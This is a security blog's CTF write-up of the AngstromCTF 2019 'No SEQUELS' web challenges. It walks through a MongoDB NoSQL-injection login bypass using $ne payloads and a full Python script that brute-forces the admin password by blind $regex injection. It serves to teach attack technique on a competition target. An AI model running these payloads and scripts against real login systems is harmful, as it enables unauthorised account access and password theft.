<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
  <head>
    

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup - 0m3g4K0d3r&#39;s Security Blog</title>
  <meta property="og:title" content="AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup" />
  <meta name="twitter:title" content="AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup" />
  <meta name="description" content="Mongodb Authentication bypass and Blind Injection">
  <meta property="og:description" content="Mongodb Authentication bypass and Blind Injection">
  <meta name="twitter:description" content="Mongodb Authentication bypass and Blind Injection">
  <meta name="author" content="omega_coder"/><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "0m3g4K0d3r\x27s Security Blog",
    
    "url": "https:\/\/omega-coder.ninja"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/omega-coder.ninja"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/omega-coder.ninja",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/omega-coder.ninja\/post\/angstromctf-2019-no-sequels-and-no-sequels2-web-writeup\/",
          "name": "Angstrom c t f 2019 | no s e q u e l s and no s e q u e l s 2 web writeup"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : "CHERIEF Yassine (omega_coder)"
  },
  "headline": "AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup",
  "description" : "This blog post contains the writeup for two challenges (No SEQUELS \x26amp; No SEQUELS 2), because they are related.\nSo let\x26rsquo;s start with No SEQUELS first.\n1. No SEQUELS 1 Category: Web\nPoints: 50\n1.2 Challenge Description  The prequels sucked, and the sequels aren\x26rsquo;t much better, but at least we always have the original trilogy.\nHint said : MongoDB is a safer alternative to SQL, right?\n 1.3 What we can get from the informations stated above ?",
  "inLanguage" : "en",
  "wordCount":  1086 ,
  "datePublished" : "2019-04-26T01:49:01",
  "dateModified" : "2019-04-26T01:49:01",
  "image" : "https:\/\/omega-coder.ninja\/img\/profile_pic.jpg",
  "keywords" : [ "ctf, nosql, mongodb, nosql-injection, web, writeup" ],
  "mainEntityOfPage" : "https:\/\/omega-coder.ninja\/post\/angstromctf-2019-no-sequels-and-no-sequels2-web-writeup\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/omega-coder.ninja",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/omega-coder.ninja\/img\/profile_pic.jpg",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>

<meta property="og:title" content="AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup" />
<meta property="og:description" content="Mongodb Authentication bypass and Blind Injection">
<meta property="og:image" content="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/b_rgb:000000,o_49/v1556407284/Screenshot_2019-04-28_01-17-11.png" />
<meta property="og:url" content="https://omega-coder.ninja/post/angstromctf-2019-no-sequels-and-no-sequels2-web-writeup/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="0m3g4K0d3r&#39;s Security Blog" />
  <meta name="twitter:title" content="AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup" />
  <meta name="twitter:description" content="Mongodb Authentication bypass and Blind Injection">
  <meta name="twitter:image" content="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/b_rgb:000000,o_49/v1556407284/Screenshot_2019-04-28_01-17-11.png" />
  <meta name="twitter:card" content="summary" />
  <meta name="twitter:site" content="@yacine_cherief" />
  <meta name="twitter:creator" content="@yacine_cherief" />
  <link href='https://omega-coder.ninja/img/favicon.ico' rel='icon' type='image/x-icon'/>
  <meta property="og:image" content="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/b_rgb:000000,o_49/v1556407284/Screenshot_2019-04-28_01-17-11.png" />
  <meta name="twitter:image" content="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/b_rgb:000000,o_49/v1556407284/Screenshot_2019-04-28_01-17-11.png" />
  <meta name="twitter:card" content="summary" />
  <meta name="twitter:site" content="@yacine_cherief" />
  <meta name="twitter:creator" content="@yacine_cherief" />
  <meta property="og:url" content="https://omega-coder.ninja/post/angstromctf-2019-no-sequels-and-no-sequels2-web-writeup/" />
  <meta property="og:type" content="website" />
  <meta property="og:site_name" content="0m3g4K0d3r&#39;s Security Blog" />

  <meta name="generator" content="Hugo 0.58.3" />
  <link rel="alternate" href="https://omega-coder.ninja/index.xml" type="application/rss+xml" title="0m3g4K0d3r&#39;s Security Blog"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link rel="stylesheet" href="https://omega-coder.ninja/css/prism.css" />

  <link rel="stylesheet" href="https://omega-coder.ninja/css/main.css" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.css" integrity="sha384-h/L2W9KefUClHWaty3SLE5F/qvc4djlyR4qY3NUV5HGQBBW7stbcfff1+I/vmsHh" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/default-skin/default-skin.min.css" integrity="sha384-iD0dNku6PYSIQLyfTOpB06F2KCZJAKLOThS5HRe8b3ibhdEQ6eKsFf/EeFxdOt5R" crossorigin="anonymous">


<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-126655681-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>


  </head>
  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://omega-coder.ninja">0m3g4K0d3r&#39;s Security Blog</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="Categories" href="/categories">Categories</a>
            </li>
          
        
          
            <li>
              <a title="About" href="/page/about/">About</a>
            </li>
          
        

        

        
          <li>
            <a href="#modalSearch" data-toggle="modal" data-target="#modalSearch" style="outline: none;">
              <span class="hidden-sm hidden-md hidden-lg">Search</span> <span id="searchGlyph" class="glyphicon glyphicon-search"></span>
            </a>
          </li>
        
      </ul>
    </div>

    
      <div class="avatar-container">
        <div class="avatar-img-border">
          <a title="0m3g4K0d3r&#39;s Security Blog" href="https://omega-coder.ninja">
            <img class="avatar-img" src="https://omega-coder.ninja/img/profile_pic.jpg" alt="0m3g4K0d3r&#39;s Security Blog" />
          </a>
        </div>
      </div>
    

  </div>
</nav>



  <div id="modalSearch" class="modal fade" role="dialog">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-header">
          <button type="button" class="close" data-dismiss="modal">&times;</button>
          <h4 class="modal-title">Search 0m3g4K0d3r&#39;s Security Blog</h4>
        </div>
        <div class="modal-body">
          <gcse:search></gcse:search>
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
        </div>
      </div>
    </div>
  </div>


    


<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>


  
  
  






  
    <div id="header-big-imgs" data-num-img=1 
      
         
          data-img-src-1="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/b_rgb:000000,o_20/v1556407284/Screenshot_2019-04-28_01-17-11.png" 
         
         data-img-desc-1="NoSQL Injection on Mongodb"
      ></div>
  

  <header class="header-section has-img">
    
      <div class="intro-header big-img">
        
        <div class="container">
          <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
              <div class="post-heading">
                <h1>AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup</h1>
                  
                    
                      <h2 class="post-subheading">Mongodb Authentication bypass and Blind Injection</h2>
                    
                  
                  
                    <span class="post-meta">
  
  
  <i class="fas fa-calendar"></i>&nbsp;Posted on April 26, 2019
  
  
    &nbsp;|&nbsp;<i class="fas fa-clock"></i>&nbsp;6&nbsp;minutes
  
  
    &nbsp;|&nbsp;<i class="fas fa-book"></i>&nbsp;1086&nbsp;words
  
  
    &nbsp;|&nbsp;<i class="fas fa-user"></i>&nbsp;CHERIEF Yassine (omega_coder)
  
  
</span>


                  
              </div>
            </div>
          </div>
        </div>
        <span class="img-desc" style="display: inline;"></span>
      </div>
    
    <div class="intro-header no-img">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="post-heading">
              
                <h1>AngstromCTF 2019 | No SEQUELS and No SEQUELS 2 Web Writeup</h1>
              
              
              
                
                  <h2 class="post-subheading">Mongodb Authentication bypass and Blind Injection</h2>
                
              
              
                <span class="post-meta">
  
  
  <i class="fas fa-calendar"></i>&nbsp;Posted on April 26, 2019
  
  
    &nbsp;|&nbsp;<i class="fas fa-clock"></i>&nbsp;6&nbsp;minutes
  
  
    &nbsp;|&nbsp;<i class="fas fa-book"></i>&nbsp;1086&nbsp;words
  
  
    &nbsp;|&nbsp;<i class="fas fa-user"></i>&nbsp;CHERIEF Yassine (omega_coder)
  
  
</span>


              
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>


    
<div class="container" role="main">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        

<p>This blog post contains the writeup for two challenges (No SEQUELS &amp; No SEQUELS 2), because they are related.</p>

<p>So let&rsquo;s start with No SEQUELS first.</p>

<h1 id="1-no-sequels-1">1. No SEQUELS 1</h1>

<p><strong>Category:</strong> Web<br />
<strong>Points:</strong> 50</p>

<hr />

<h2 id="1-2-challenge-description">1.2 Challenge Description</h2>

<blockquote>
<p>The prequels sucked, and the sequels aren&rsquo;t much better, but at least we always have the <a href="https://nosequels.2019.chall.actf.co">original trilogy</a>.</p>

<p>Hint said : <em>MongoDB is a safer alternative to SQL, right?</em></p>
</blockquote>

<h4 id="1-3-what-we-can-get-from-the-informations-stated-above">1.3 What we can get from the informations stated above ?</h4>

<ul>
<li>They are using MongoDB as a NoSQL engine.</li>
<li>we can guess from hint that its a simple Auth bypass with MongoDB NoSQL injection.</li>
</ul>

<p>We are presented a part of the source code of how the authentication happens.</p>

<p><img src="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/v1556371044/1_xKB1P9_JsMbdjYLkCsnHvw.png" alt="no_sequels_source_code" /></p>

<h3 id="1-4-exaplanation">1.4 Exaplanation</h3>

<p>This simple authentication uses <code>JWT</code> (JSON Web Tokens), trying to hack the token won&rsquo;t help because the JWT token is being signed with a <code>secret key</code> and we don&rsquo;t know the key actually.</p>

<p>After reading the code, this is clearly a NoSQL Injection because of unsanitized user input.</p>

<p>The following two lines show that the variables username and password are not sanitized in any way.</p>

<pre><code class="language-js">var user = req.body.username;
var pass = req.body.password;
</code></pre>

<p>One more thing to notice, the line below show that the body can be parsed using json regarded that we supply some json input with <code>Content-Type: application/json</code>.</p>

<pre><code class="language-js">app.use(bodyParser.json());
</code></pre>

<p>NoSQL databases are still potentially vulnerable to injection attacks, even if they aren&rsquo;t using the traditional <code>SQL</code> syntax.</p>

<p>The unsanitisation of username and password will lead to NoSQL code injection.</p>

<p>What would happen if we post the following JSON data:</p>

<pre><code class="language-http">POST https://nosequels.2019.chall.actf.co HTTP/1.1
Content-Type: application/json
{
    &quot;username&quot;: {&quot;$ne&quot;: null},
    &quot;password&quot;: {&quot;$ne&quot;: null}
}
</code></pre>

<p>By Sending this payload the username &amp; password will be parsed as so, thus the query being</p>

<pre><code class="language-javascript">var query = {
    username: {&quot;$ne&quot;: null};
    password: {&quot;$ne&quot;: null};
}
    
</code></pre>

<p>Now, executing the line below from the app source code will return the first row, and we will be authenticated.</p>

<pre><code class="language-javascript">db.collection('users').findOne(query, function(err, user) {
    if (!user) {
        res.send(&quot;Wrong username or password&quot;);
        return 
    }
    res.cookie('token', jwt.sign({name: user.username, authnticated: true}, secret));
    res.redirect(&quot;/site&quot;);
});
</code></pre>

<p>Let&rsquo;s write a script to do the work for us, and get that first <code>FLAG</code>.</p>

<p>We will be using python requests module.</p>

<pre><code class="language-python">import requests
import re
URL = &quot;https://nosequels.2019.chall.actf.co/login&quot;
payload = '{&quot;username&quot;: {&quot;$ne&quot;: null}, &quot;password&quot;: {&quot;$ne&quot;: null}}'
cookies = {&quot;token&quot;: &quot;still_dont_know&quot;} 
# we could have done it manually, and replaced the token with
# the token that your browser got for you

# init session
session = requests.Session()
# set re expression for token in headers
jwt_token_re = re.compile(r&quot;token=(.*);&quot;)
# Getting the token for the first time

token_req = session.get(URL)
if token_req.status_code == 200:
    m = re.search(jwt_token_re, token_req.headers[&quot;Set-Cookie&quot;])
    if m:
        # update token in cookies dict
        cookies[&quot;token&quot;] = str(m.group(1))

    # Now let's send the json payload alongside the cookie we got above.
    # we will leave requests default behaviour to follow redirects which will redirect us to /site

flag_re = re.compile(r&quot;actf{.*}&quot;)

# make request with mallicious payload

req = session.post(URL, json=payload, cookies=cookies, verify=False)
# verify=False is just for HTTPS connection

if req.status_code == 200:
    # FLAG match
    m = re.search(flag_re, req.text)
    if m:
        print(&quot;1st FLAG: &quot;, m.group(0)) 
</code></pre>

<p><strong><code>FLAG is : actf{no_sql_doesn’t_mean_no_vuln}</code></strong></p>

<p><code>NOTE: we could have done the same thing using BurpSuite: first we send the query, intercept it using BurpSuite, change Content-Type to application/json and modify the body with our json payload. :D</code></p>

<h1 id="2-no-sequels-2">2. No SEQUELS 2</h1>

<p>Let&rsquo;s see the solution for NoSEQUELS 2</p>

<p>If we copy the last token we got after sending the json payload, we can now request <strong><code>/site</code></strong> (using a GET request of course) and we are presented with the following page.</p>

<p><img src="https://res.cloudinary.com/https-omega-coder-github-io/image/upload/v1556487393/1_zD92g6-1Z1HnRlHcfkrbBg.png" alt="site_page" /></p>

<p>It says <code>suspicious activity detected</code> and we need to provide the password for user <strong><code>admin</code></strong> and one more thing, it says that there will be no database query!!!.</p>

<h3 id="2-1-things-we-can-derive-from-the-above">2.1 Things we can derive from the above.</h3>

<ol>
<li><code>admin</code> user exists.</li>
<li>the exploitation will be on the previous login page, because we can&rsquo;t do no database query here.</li>
</ol>

<p>So, we need to get the correct password for <code>admin</code>, and we will do it using <code>$regex</code> and also we need to do it in a Blind way</p>

<p>Here is the payload we will be using</p>

<pre><code class="language-json">new_payload = {&quot;username&quot;: {&quot;$eq&quot;: &quot;admin&quot; }, &quot;password&quot;: {&quot;$regex&quot;: &quot;^some_chars.*&quot;}}
</code></pre>

<p>So basically, we will be bruteforcing the password by checking it against a regular expression pattern.</p>

<h4 id="2-2-example">2.2 Example</h4>

<p>let&rsquo;s say we send the following payload</p>

<pre><code class="language-json">payload = {&quot;username&quot;: {&quot;$eq&quot;: &quot;admin&quot; }, &quot;password&quot;: {&quot;$regex&quot;: &quot;^c.*&quot;}}
</code></pre>

<p>if we get a 302 status code (a redirect to <code>/site</code>) then the password does indeed start with a <strong><code>c</code></strong>, now we can build our final Blind NoSQL exploitation script using python</p>

<p>You can also get the password length using <strong><code>$regex</code></strong> again, with this payload <strong><code>.{number}</code></strong>, i already found the password length to be equal to <code>14</code>.</p>

<h3 id="2-3-final-exploit-script-fully-automated">2.3 Final Exploit Script, (fully automated)</h3>

<pre><code class="language-python">import requests # used to make requests
import string   # for building the password
import re       # for cheking token pattern and FLAG pattern

session = requests.Session() # creates a session, not really needed tho.
cookies = {&quot;token&quot;: &quot;fucking_dont_know_1337&quot;}
URL = &quot;https://nosequels.2019.chall.actf.co/login&quot;

# make first GET request.
# this is only done to get the first unauthenticated token
jwt_token_re = re.compile(r&quot;token=(.*);&quot;)
dummy = session.get(URL)

if dummy.status_code == 200:
    m = re.search(jwt_token_re, dummy.headers[&quot;Set-Cookie&quot;])
    if m:
        cookies[&quot;token&quot;] = str(m.group(1))
        print(&quot;[?] Cookie set&quot;)

# Creates new payload
new_payload = {&quot;username&quot;: {&quot;$eq&quot;: &quot;admin&quot; }, &quot;password&quot;: {&quot;$regex&quot;: None}}


restart_the_damn_loop = True # control the loop, no one want an infinite loop
regex_payload = &quot;&quot; # this is the current compared password 
flag = regex_payload # flag is initialized as regex payload == &quot;&quot;

while restart_the_damn_loop:
    restart_the_damn_loop = False
    for i in string.ascii_letters + string.digits + &quot;!@#$%^()@_{}&quot;:
        regex_payload += i
        new_payload[&quot;password&quot;][&quot;$regex&quot;] = &quot;^&quot;+regex_payload + &quot;.*&quot;
        req = session.post(URL, verify=False, cookies=cookies, json=new_payload, allow_redirects=False)
        if req.status_code == 302: # a 302 repsonse code means payload passed
            restart_the_damn_loop = True
            flag += i
            if len(flag) == 14: # check if length == 14
                restart_the_damn_loop = False
                m = re.search(jwt_token_re, req.headers[&quot;Set-Cookie&quot;])
                if m:
                    # sets the token cookie, we will use it when visiting /site
                    cookies[&quot;token&quot;] = str(m.group(1))
                print(&quot;[?] pass till now : &quot;, flag)
                break
        else:
            regex_payload = flag
            restart_the_damn_loop = True


# make last request and get the damn flag.

print(&quot;Password: &quot; + flag)
URL = &quot;https://nosequels.2019.chall.actf.co/site&quot;

# POST Parameter for /site page is named : pass2
r = session.post(URL, verify=False, data={&quot;pass2&quot;: flag}, cookies=cookies)
# setting verify=False is only better when solving CTF challenges.
# because we dont need it :D   
m = re.search(r&quot;actf{.*}&quot;, r.text)
if m:
    print(&quot;[+] FLAG: &quot;, m.group(0))

</code></pre>

<p>An here is the flag: <strong><code>actf{still_no_sql_in_the_sequel}</code></strong></p>

<p>Thanks for reading! :D</p>


        
          <div class="blog-tags">
            
              <a href="https://omega-coder.ninja/tags/ctf/">ctf</a>&nbsp;
            
              <a href="https://omega-coder.ninja/tags/nosql/">nosql</a>&nbsp;
            
              <a href="https://omega-coder.ninja/tags/mongodb/">mongodb</a>&nbsp;
            
              <a href="https://omega-coder.ninja/tags/nosql-injection/">nosql-injection</a>&nbsp;
            
              <a href="https://omega-coder.ninja/tags/web/">web</a>&nbsp;
            
              <a href="https://omega-coder.ninja/tags/writeup/">writeup</a>&nbsp;
            
          </div>
        

        
            <hr/>
            <section id="social-share">
              <div class="list-inline footer-links">
                

<div class="share-box" aria-hidden="true">
    <ul class="share">
      
      <li>
        <a href="//twitter.com/share?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f&amp;text=AngstromCTF%202019%20%7c%20No%20SEQUELS%20and%20No%20SEQUELS%202%20Web%20Writeup&amp;via=yacine_cherief" target="_blank" title="Share on Twitter">
          <i class="fab fa-twitter"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//plus.google.com/share?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f" target="_blank" title="Share on Google Plus">
          <i class="fab fa-google-plus"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f" target="_blank" title="Share on Facebook">
          <i class="fab fa-facebook"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//reddit.com/submit?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f&amp;title=AngstromCTF%202019%20%7c%20No%20SEQUELS%20and%20No%20SEQUELS%202%20Web%20Writeup" target="_blank" title="Share on Reddit">
          <i class="fab fa-reddit"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.linkedin.com/shareArticle?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f&amp;title=AngstromCTF%202019%20%7c%20No%20SEQUELS%20and%20No%20SEQUELS%202%20Web%20Writeup" target="_blank" title="Share on LinkedIn">
          <i class="fab fa-linkedin"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.stumbleupon.com/submit?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f&amp;title=AngstromCTF%202019%20%7c%20No%20SEQUELS%20and%20No%20SEQUELS%202%20Web%20Writeup" target="_blank" title="Share on StumbleUpon">
          <i class="fab fa-stumbleupon"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.pinterest.com/pin/create/button/?url=https%3a%2f%2fomega-coder.ninja%2fpost%2fangstromctf-2019-no-sequels-and-no-sequels2-web-writeup%2f&amp;description=AngstromCTF%202019%20%7c%20No%20SEQUELS%20and%20No%20SEQUELS%202%20Web%20Writeup" target="_blank" title="Share on Pinterest">
          <i class="fab fa-pinterest"></i>
        </a>
      </li>
    </ul>
  </div>
  
              </div>
            </section>
        

        
          
          
          <h4 class="see-also">See also</h4>
          <ul>
          
            <li><a href="/post/hacklab-esgi-2019-rookie-web-writeup/">Hacklab ESGI 2019 |  Rookie Web100 Writeup</a></li>
          
            <li><a href="/post/securinets-ctf-2019-lost-flag-writeup/">Securinets CTF 2k19 Lost Flag Writeup</a></li>
          
            <li><a href="/post/angstromctf-2019-secret-sheep-society-writeup-crypto/">AngstromCTF 2019 Secret Sheep Society | CTF Writeup</a></li>
          
          </ul>
          
        
      </article>

      
        <ul class="pager blog-pager">
          
            <li class="previous">
                <a href="https://omega-coder.ninja/post/angstromctf-2019-secret-sheep-society-writeup-crypto/" data-toggle="tooltip" data-placement="top" title="AngstromCTF 2019 Secret Sheep Society | CTF Writeup">&larr; AngstromCTF 2019 Secret Sheep …</a>
            </li>
          
          
            <li class="next">
                <a href="https://omega-coder.ninja/post/inshack-you-shall-not-pass-forensics-330-writeup/" data-toggle="tooltip" data-placement="top" title="INShAck 2019 :: You Shall Not Pass :: Forensics 330 Writeup">INShAck 2019 :: You Shall Not … &rarr;</a>
            </li>
          
        </ul>
      


      
        
          
          <div class="disqus-comments">
            <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "omega-coder" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
          </div>
          
        
        
      

    </div>
  </div>
</div>

    <footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
                <a href="mailto:admin@omega-coder.me" title="Email me">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://www.facebook.com/yacinewebdz" title="Facebook">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-facebook fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://github.com/omega-coder" title="GitHub">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://twitter.com/yacine_cherief" title="Twitter">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://www.instagram.com/omega_coder" title="Instagram">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-instagram fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://www.youtube.com/channel/UCJ84GVWJlcEjLVckwgtH58g" title="Youtube">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-youtube fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://open.spotify.com/user/omega_coder" title="Spotify">
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-spotify fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
          <li>
            
            <a href="https://omega-coder.ninja/index.xml" title="RSS">
            
              <span class="fa-stack fa-lg">
                <i class="fas fa-circle fa-stack-2x"></i>
                <i class="fas fa-rss fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
        </ul>
        <p class="credits copyright text-muted">
          
            
              <a href="https://omega-coder.ninja">omega_coder</a>
            
          

          &nbsp;&bull;&nbsp;&copy;
          
            2019
          

          
            &nbsp;&bull;&nbsp;
            <a href="https://omega-coder.ninja">0m3g4K0d3r&#39;s Security Blog</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="http://gohugo.io">Hugo v0.58.3</a> powered &nbsp;&bull;&nbsp; Theme by <a href="http://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a> adapted to <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a>
          
        </p>
      </div>
    </div>
  </div>
</footer><script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

<script src="https://omega-coder.ninja/js/main.js"></script><script> renderMathInElement(document.body); </script>
<script src="https://omega-coder.ninja/js/prism.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.js" integrity="sha384-QELNnmcmU8IR9ZAykt67vGr9/rZJdHbiWi64V88fCPaOohUlHCqUD/unNN0BXSqy" crossorigin="anonymous"></script>
